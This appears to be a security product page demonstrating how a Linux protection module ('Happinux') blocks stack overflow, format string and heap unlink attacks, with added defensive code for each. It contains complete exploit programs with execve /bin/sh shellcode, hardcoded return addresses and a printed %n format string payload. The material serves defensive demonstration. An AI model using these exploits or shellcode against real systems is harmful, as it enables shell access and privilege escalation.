Existing BOF prevention solutions are open to practical attacks that do not change the stack return address directly,
such as off-by-one or frame pointer overwrite.
They do not even notice the Return to Library (RTL) BOF attack, which does not use shellcode.
For this reason the Happinux cracking prevention module detects
and blocks stack-based BOF with a special security policy.
[root@test technic]# cat over.c
#include <stdio.h>
#include <string.h>   /* strcpy */
/* target code: unbounded copy of argv[1] into a 100-byte stack buffer */
int main(int argc, char *argv[])
{
    char x[100];
    strcpy(x, argv[1]);
    return 0;
}
[root@test technic]# cat over_xp.c
#include <stdio.h>
#include <string.h>   /* memset */
#include <unistd.h>   /* execle */
/* exploit code */
int main()
{
    int i;
    char shellcode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
        "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
    char *env[2];
    char x[200];
    memset(x, 0, 200);
    env[0] = shellcode;   /* shellcode is passed in the environment, i.e. on the stack */
    env[1] = NULL;
    for (i = 0; i < 0x78; i++)
    {
        x[i] = 0x41;
    }
    *(long *)&x[i] = 0x82828282; i += 4; // ebp
    *(long *)&x[i] = 0xbfffffd0; i += 4; // ret
    execle("./over", "over", x, NULL, env);
    return 0;
}
[root@test technic]#
Output of the code above.
[PIC 1: General stack based overflow exploit]
You can see that a new shell runs on a general server.
Now I will show how the exploit behaves on a
Happinux system with shellcode prevention mode enabled.
[PIC 2: Stack based buffer overflow on Happinux system]
You can see that the attack failed. Next is the debugging output.
[root@test technic]# gdb -q over_xp
(gdb) r
Starting program: /tmp/technic/over_xp

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40000be0 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.
execute error: '//bin/sh'
This execution used shellcode that use 'Stack'. Its execution is very dangerous.
Intercepting execution, This can prevent remote attack or local attack.
example) Stack based Overflow, Format String attack ...

Program received signal SIGSEGV, Segmentation fault.
0xbffffff7 in ?? ()
(gdb) x/10x 0xbffffff7
0xbffffff7:     0x7265766f      0x00000000
Cannot access memory at address 0xbfffffff
(gdb) x/10x 0xbffffff7-30
0xbfffffd9:     0x31909090      0x6e6852d2      0x6868732f      0x69622f2f
0xbfffffe9:     0x5352e389      0x428de189      0x0080cd0b      0x766f2f2e
0xbffffff9:     0x00007265
Cannot access memory at address 0xbffffffd
(gdb)
This shows that a segmentation fault occurred because the shellcode execution failed.
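The debugger message above shows the policy that tripped: execution was intercepted because the instruction pointer was inside the stack. As an added example (not part of the original page and not Happinux code), the following user-space model makes that decision from /proc/<pid>/maps-style records: it refuses execution from the [stack] mapping or from any mapping that lacks the x permission, and allows it from executable file-backed mappings. The mapping records are a constructed sample modelled on the addresses in the session above, and all function and constant names are my own.

```c
#include <stdio.h>
#include <string.h>

/* One parsed /proc/<pid>/maps record. */
struct mapping {
    unsigned long start, end;
    char perms[5];      /* e.g. "r-xp" */
    char path[64];      /* file name, "[stack]", or "" for anonymous */
};

/* Parse one maps line; returns 1 on success, 0 if the line is malformed. */
int parse_maps_line(const char *line, struct mapping *m)
{
    int n;
    m->path[0] = '\0';
    n = sscanf(line, "%lx-%lx %4s %*s %*s %*s %63s",
               &m->start, &m->end, m->perms, m->path);
    return n >= 3 && m->start < m->end;
}

#define EXEC_ALLOW    1
#define EXEC_DENY     0
#define EXEC_UNMAPPED (-1)

/* Policy check: may the CPU execute at address ip, given the maps text?
 * Denies execution from the [stack] mapping or from any mapping that is
 * not marked executable; allows it from executable mappings. */
int exec_policy(const char *maps, unsigned long ip)
{
    const char *p = maps;
    while (*p) {
        char line[256];
        struct mapping m;
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        p = nl ? nl + 1 : p + len;

        if (!parse_maps_line(line, &m)) continue;
        if (ip < m.start || ip >= m.end) continue;
        if (strcmp(m.path, "[stack]") == 0) return EXEC_DENY;
        if (strchr(m.perms, 'x') == NULL) return EXEC_DENY;
        return EXEC_ALLOW;
    }
    return EXEC_UNMAPPED;
}

/* Constructed sample modelled on the 2.4-era layout seen in the gdb
 * sessions (text at 0x08048000, ld.so at 0x40000000, stack below 0xc0000000). */
const char *sample_maps =
    "08048000-08049000 r-xp 00000000 03:05 123456 /tmp/technic/over\n"
    "08049000-0804a000 rw-p 00000000 03:05 123456 /tmp/technic/over\n"
    "40000000-40013000 r-xp 00000000 03:05 654321 /lib/ld-linux.so.2\n"
    "bffff000-c0000000 rwxp 00000000 00:00 0 [stack]\n";

int main(void)
{
    /* 0xbffffff7 is where the blocked shellcode faulted in the session above */
    printf("0xbffffff7 -> %d (0 = deny)\n",  exec_policy(sample_maps, 0xbffffff7UL));
    printf("0x40000be0 -> %d (1 = allow)\n", exec_policy(sample_maps, 0x40000be0UL));
    return 0;
}
```

Note that the sample stack mapping is rwxp, as it was on kernels of that era; the policy still denies it by name, which is the behaviour the product message describes. On a kernel with a non-executable stack the perms check alone would give the same answer.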
Preventing stack- and heap-based format string attacks
Many security solutions are open to newly appeared attacks developed after 2000. The format string attack is one of these;
it works on both the stack and the heap, and no perfect prevention solution has been developed so far.
Happinux can detect and block all such practical
attacks, including format string attacks that use RTL and small format strings.
[root@test technic]# cat format.c
#include <stdio.h>
#include <string.h>   /* strncpy */
/* target code: user input is passed to printf as the format string */
int main(int argc, char *argv[])
{
    char x[100];
    strncpy(x, argv[1], 100);
    printf(x);
    return 0;
}
[root@test technic]# cat for_xp16.c
#include <stdio.h>
#include <string.h>   /* memset */
#include <unistd.h>   /* execle */
/* exploit code */
#define RET 0x08049528
#define SHELLCODE 0xbfffffd0
#define PAD 4
int main()
{
    int i;
    long shell = SHELLCODE;
    int pad = PAD;
    long a, b;
    char shellcode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
        "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
    char *env[2];
    char x[200];
    char head[16];
    memset(x, 0, 200);
    memset(head, 0, 16);
    env[0] = shellcode;
    env[1] = NULL;
    *(long *)&head[0]  = 0x41414141;
    *(long *)&head[4]  = RET;
    *(long *)&head[8]  = 0x41414141;
    *(long *)&head[12] = RET + 2;
    a = (shell >> 16) & 0xffff;
    b = (shell >> 0) & 0xffff;
    sprintf(x, "%s%%%d$%ux%%%d$n%%%d$%ux%%%d$n",
            head, pad, b - 16, pad + 1, pad + 2, (0x10000 + a) - b, pad + 3);
    printf("%s\n", x);
    execle("./format", "format", x, NULL, env);
    return 0;
}
[root@test technic]# cat for_xp32.c
#include <stdio.h>
#include <string.h>   /* memset */
#include <unistd.h>   /* execle */
/* exploit code */
#define RET 0x08049528
#define SHELLCODE 0xbfffffd0
#define PAD 4
int main()
{
    int i;
    long shell = SHELLCODE;
    int pad = PAD;
    long a, b, c, d;
    long a1, b1, c1, d1;
    char shellcode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
        "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
    char *env[2];
    char x[200];
    char head[32];
    memset(x, 0, 200);
    memset(head, 0, 32);
    env[0] = shellcode;
    env[1] = NULL;
    *(long *)&head[0]  = 0x41414141;
    *(long *)&head[4]  = RET;
    *(long *)&head[8]  = 0x41414141;
    *(long *)&head[12] = RET + 1;
    *(long *)&head[16] = 0x41414141;
    *(long *)&head[20] = RET + 2;
    *(long *)&head[24] = 0x41414141;
    *(long *)&head[28] = RET + 3;
    a = (shell >> 24) & 0xff;
    b = (shell >> 16) & 0xff;
    c = (shell >> 8) & 0xff;
    d = (shell >> 0) & 0xff;
    a1 = (shell >> 24) & 0xff;
    b1 = (shell >> 16) & 0xff;
    c1 = (shell >> 8) & 0xff;
    d1 = (shell >> 0) & 0xff;
    if (d1 - 32 < 10) d += 0x100;
    if (c1 - d1 < 10) c += 0x100;
    if (b1 - c1 < 10) b += 0x100;
    sprintf(x, "%s%%%d$%ux%%%d$n%%%d$%ux%%%d$n%%%d$%ux%%%d$n%%%d$%ux%%%d$n",
            head, pad, d - 32, pad + 1, pad + 2, c - d1, pad + 3, pad + 4, b - c1, pad + 5,
            pad + 6, 0x100 + a - b1, pad + 7);
    printf("%s\n", x);
    execle("./format", "format", x, NULL, env);
    return 0;
}
[root@test technic]#
The first listing has a format string vulnerability; the second is exploit code that rewrites the return address twice using a 16-byte retaddr head,
and the last is exploit code that rewrites it three times using a 32-byte retaddr head.
The next picture shows the output of running the for_xp16 and
for_xp32 exploit code.
[PIC 3: format string exploit on Happinux system]
You can confirm that the attack failed.
[root@test technic]# gdb -q for_xp32
(gdb) r
Starting program: /tmp/technic/for_xp32
AAAAAAAAAAAAAAAA%4$176x%5$n%6$47x%7$n%8$256x%9$n%10$192x%11$n

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40000be0 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.
execute error: '//bin/sh'
This execution used shellcode that use 'Stack'. Its execution is very dangerous.
Intercepting execution, This can prevent remote attack or local attack.
example) Stack based Overflow, Format String attack ...

Program received signal SIGSEGV, Segmentation fault.
0xbffffff5 in ?? ()
(gdb) x/10x 0xbffffff5-30
0xbfffffd7:     0x31909090      0x6e6852d2      0x6868732f      0x69622f2f
0xbfffffe7:     0x5352e389      0x428de189      0x0080cd0b      0x6f662f2e
0xbffffff7:     0x74616d72      0x00000000
(gdb)
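Two defensive checks belong next to this section, as an added example that is neither the page's nor Happinux's code: a scanner that walks an untrusted string the way printf would and counts the conversions it contains, in particular the memory-writing %n, and the one-line hardening of the target (untrusted data goes in as an argument, never as the format). The struct and function names are my own; the payload the usage note refers to is the one printed by for_xp32 in the debugger session above.

```c
#include <stdio.h>
#include <string.h>

/* Result of scanning an untrusted string for printf directives. */
struct fmt_report {
    int directives;   /* conversions other than the literal "%%" */
    int writes;       /* "%n" conversions, which write to memory */
    int positional;   /* conversions using the "N$" argument selector */
};

/* Walk s exactly as printf would, counting what it would try to do.
 * A '%' followed by '%' is a literal; otherwise skip the optional
 * position ("N$"), flags, width, precision and length modifier,
 * then classify the conversion character. */
void scan_format(const char *s, struct fmt_report *r)
{
    memset(r, 0, sizeof *r);
    for (; *s; s++) {
        const char *d, *q;
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }          /* "%%" prints a '%' */
        d = s + 1;
        q = d;                                       /* positional selector */
        while (*q >= '0' && *q <= '9') q++;
        if (q != d && *q == '$') { r->positional++; d = q + 1; }
        while (*d && strchr("-+ #0", *d)) d++;                      /* flags */
        while ((*d >= '0' && *d <= '9') || *d == '*') d++;          /* width */
        if (*d == '.') {                                            /* precision */
            d++;
            while ((*d >= '0' && *d <= '9') || *d == '*') d++;
        }
        while (*d && strchr("hlLqjzt", *d)) d++;                    /* length */
        if (*d == '\0') break;                       /* dangling '%' at end */
        r->directives++;
        if (*d == 'n') r->writes++;
        s = d;                                       /* resume after conversion */
    }
}

/* Policy helper: true when the string contains no conversion at all,
 * i.e. it cannot read or write anything if it ever reaches a format API. */
int format_is_clean(const char *s)
{
    struct fmt_report r;
    scan_format(s, &r);
    return r.directives == 0;
}

/* Hardened form of the page's target: the user string is an argument to
 * a fixed format, so its '%' characters are printed, not interpreted. */
int print_untrusted(const char *untrusted)
{
    return printf("%s\n", untrusted);
}

int main(int argc, char *argv[])
{
    struct fmt_report r;
    const char *input = argc > 1 ? argv[1] : "constructed sample: %s%s%n";
    scan_format(input, &r);
    printf("directives=%d writes=%d positional=%d\n",
           r.directives, r.writes, r.positional);
    return print_untrusted(input) < 0;
}
```

On the for_xp32 payload (AAAAAAAAAAAAAAAA%4$176x%5$n%6$47x%7$n%8$256x%9$n%10$192x%11$n) scan_format reports 8 directives, 4 of them %n writes, all positional; on a benign string such as "100%% done" it reports none. Compiling the target with -Wformat-security also flags printf(x) at build time, which catches the defect before any runtime policy has to.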
Blocking heap-based buffer overflow (double free,
malloc/free exploit) attacks
Heap-based attacks, among the newest cracking techniques, can go around security solutions and leave them helpless.
Happinux can detect and block all of these latest attacks, including their practical variants.
[root@test technic]# cat heap.c
#include <stdio.h>
#include <stdlib.h>   /* malloc, free */
#include <string.h>   /* strcpy */
/* target code: unbounded copy into a 100-byte heap chunk, then free */
int main(int argc, char *argv[])
{
    char *x = (char *)malloc(100);
    char *y = (char *)malloc(80);
    strcpy(x, argv[1]);
    free(x);
    free(y);
    return 0;
}
[root@test technic]# cat heap_xp.c
#include <stdio.h>
#include <string.h>   /* memset */
#include <unistd.h>   /* execle */
/* exploit code */
#define RET 0x08049584
int main()
{
    int i;
    char shellcode[] =
        "\xeb\x0c\xeb\x0c\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
        "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
    char *env[2];
    char x[200];
    memset(x, 0, 200);
    env[0] = shellcode;
    env[1] = NULL;
    for (i = 0; i < 96; i++)
    {
        x[i] = 0x40;
    }
    *(long *)&x[i] = 0xfffffffc; i += 4;
    *(long *)&x[i] = 0xffffffff; i += 4;
    *(long *)&x[i] = RET - 12;   i += 4;
    *(long *)&x[i] = 0xbfffffbc; i += 4;
    execle("./heap", "heap", x, NULL, env);
    return 0;
}
[root@test technic]#
Output of the malloc/free exploit on the heap.
[PIC 4: Heap based buffer overflow attack on Happinux system]
The execution has been cancelled because it uses shellcode on the stack.
Debugging output:
[root@test technic]# gdb -q heap_xp
(gdb) r
Starting program: /tmp/technic/heap_xp

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40000be0 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.
execute error: '//bin/sh'
This execution used shellcode that use 'Stack'. Its execution is very dangerous.
Intercepting execution, This can prevent remote attack or local attack.
example) Stack based Overflow, Format String attack ...

Program received signal SIGSEGV, Segmentation fault.
0xbffffffc in ?? ()
(gdb) x/10x 0xbffffffc-30
0xbfffffde:     0x2f6e6852      0x2f686873      0x8969622f      0x895352e3
0xbfffffee:     0x0b428de1      0x2e0080cd      0x6165682f      0x00000070
0xbffffffe:     Cannot access memory at address 0xbffffffe
(gdb) q
The program is running.  Exit anyway? (y or n) y
[root@test technic]#
You can confirm that the shellcode execution failed.
Happinux prevents the abuse of system library functions that is the core of the RTL attack.
As a result, the special character ";" (semicolon) vulnerability and PHP injection vulnerabilities are blocked as well.
Happinux blocks race condition attacks and backdoor attacks that use symbolic links.
The next picture shows a malicious backdoor
execution being blocked.
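The heap exploit above works because the allocator's unlink step trusted the fd and bk pointers of a chunk whose header had been overwritten. As an added example (not the page's or Happinux's code, and a model rather than a real allocator), the following shows the classic unchecked unlink next to the checked form that modern glibc uses, which refuses to unlink a chunk unless both neighbours point back to it; the demo function builds a small free list, unlinks an intact chunk, then corrupts one and shows that the write is refused. Struct and function names are my own.

```c
#include <stddef.h>

/* Minimal model of a doubly linked free list of heap chunks, as used by
 * the malloc implementations the exploit above targets. */
struct chunk {
    size_t size;
    struct chunk *fd;   /* next free chunk */
    struct chunk *bk;   /* previous free chunk */
};

/* Unchecked unlink: the classic macro. It trusts fd and bk blindly, so an
 * overflow that rewrites them turns free() into an arbitrary write. */
void unlink_unchecked(struct chunk *p)
{
    struct chunk *fd = p->fd, *bk = p->bk;
    fd->bk = bk;
    bk->fd = fd;
}

/* Checked unlink: refuse unless both neighbours point back at p. A
 * fd/bk pair supplied by an overflow (a GOT slot and a stack address,
 * as in heap_xp.c) cannot satisfy both conditions, so nothing is written.
 * Returns 0 on success, -1 when the list is corrupted. */
int unlink_checked(struct chunk *p)
{
    struct chunk *fd = p->fd, *bk = p->bk;
    if (fd == NULL || bk == NULL) return -1;
    if (fd->bk != p || bk->fd != p) return -1;   /* "corrupted double-linked list" */
    fd->bk = bk;
    bk->fd = fd;
    p->fd = p->bk = NULL;
    return 0;
}

/* Demonstration: build head <-> a <-> b <-> head, unlink a legitimately,
 * then corrupt b's links the way an overflow would and show the checked
 * unlink refuses. Returns 1 when both behaviours are as described. */
int demo_safe_unlink(void)
{
    struct chunk head = {0, NULL, NULL}, a = {96, NULL, NULL}, b = {80, NULL, NULL};
    struct chunk decoy = {0, NULL, NULL};   /* stands in for the overwrite targets */

    head.fd = &a; a.bk = &head;
    a.fd = &b;    b.bk = &a;
    b.fd = &head; head.bk = &b;

    if (unlink_checked(&a) != 0) return 0;              /* intact list: allowed */
    if (head.fd != &b || b.bk != &head) return 0;       /* links repaired correctly */

    b.fd = &decoy; b.bk = &decoy;                       /* overflow-style corruption */
    if (unlink_checked(&b) != -1) return 0;             /* must be refused */
    if (decoy.fd != NULL || decoy.bk != NULL) return 0; /* and nothing was written */
    return 1;
}
```

The check costs two loads per unlink and is why, on a current glibc, the heap_xp.c payload aborts inside free() with "corrupted double-linked list" instead of reaching the shellcode at all; the runtime policy shown above is the second line of defence behind it.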
[PIC 5: Setuid backdoor attack on Happinux system]
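Symlink races of the kind mentioned above come from checking a path and then opening it as two separate steps, which leaves a window in which the name can be swapped for a link. As an added example (not the page's or Happinux's code), the following opens a file only if its final path component is not a symlink and the object is a regular file, using O_NOFOLLOW and O_EXCL so the kernel applies the check on the very inode it opens; the self-check creates its own temporary directory. Function names are my own.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open path for reading without following a symlink in its final
 * component, and only if the object is a regular file. O_NOFOLLOW
 * removes the lstat-then-open race: the kernel decides on the inode it
 * actually opens. Returns an fd, or -1 with errno set (ELOOP when the
 * path is a symlink, EPERM when it is not a regular file). */
int open_regular_nofollow(const char *path)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;
    if (fstat(fd, &st) < 0) { close(fd); return -1; }
    if (!S_ISREG(st.st_mode)) { close(fd); errno = EPERM; return -1; }
    return fd;
}

/* Create a file that must not already exist: with O_EXCL a name that an
 * attacker planted (file or link) makes the call fail with EEXIST instead
 * of being silently followed. */
int create_private_file(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_CLOEXEC, 0600);
}

/* Self-check in a private temp directory: the real file opens, the
 * symlink to it is refused with ELOOP, and creating at the planted link
 * name fails with EEXIST. Returns 1 when all three hold. */
int demo_nofollow(void)
{
    char dir[] = "/tmp/nofollow-demo-XXXXXX";   /* constructed scratch location */
    char file[128], lnk[128];
    int fd, a, b, b_errno, c, c_errno, ok = 0;

    if (mkdtemp(dir) == NULL) return 0;
    snprintf(file, sizeof file, "%s/data", dir);
    snprintf(lnk, sizeof lnk, "%s/link", dir);

    fd = create_private_file(file);             /* fresh name: succeeds */
    if (fd >= 0 && symlink(file, lnk) == 0) {
        a = open_regular_nofollow(file);        /* regular file: opens */
        b = open_regular_nofollow(lnk);         /* symlink: refused */
        b_errno = errno;
        c = create_private_file(lnk);           /* planted name: refused */
        c_errno = errno;
        ok = a >= 0 && b < 0 && b_errno == ELOOP && c < 0 && c_errno == EEXIST;
        if (a >= 0) close(a);
        if (b >= 0) close(b);
        if (c >= 0) close(c);
        unlink(lnk);
    }
    if (fd >= 0) close(fd);
    unlink(file);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("nofollow self-check: %s\n", demo_nofollow() ? "ok" : "FAILED");
    return 0;
}
```

A privileged program that writes to a world-writable directory should combine this with a per-directory fstat check (owner and sticky bit) or, better, avoid shared directories altogether; the two open flags only close the link-following half of the race.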
Blocking ptrace and kernel hacking attacks
[PIC 6: Blocking kernel do_brk exploit]
[PIC 7: Blocking kernel do_mremap exploit]
Reference: Sample exploits tested on Happinux – [Download]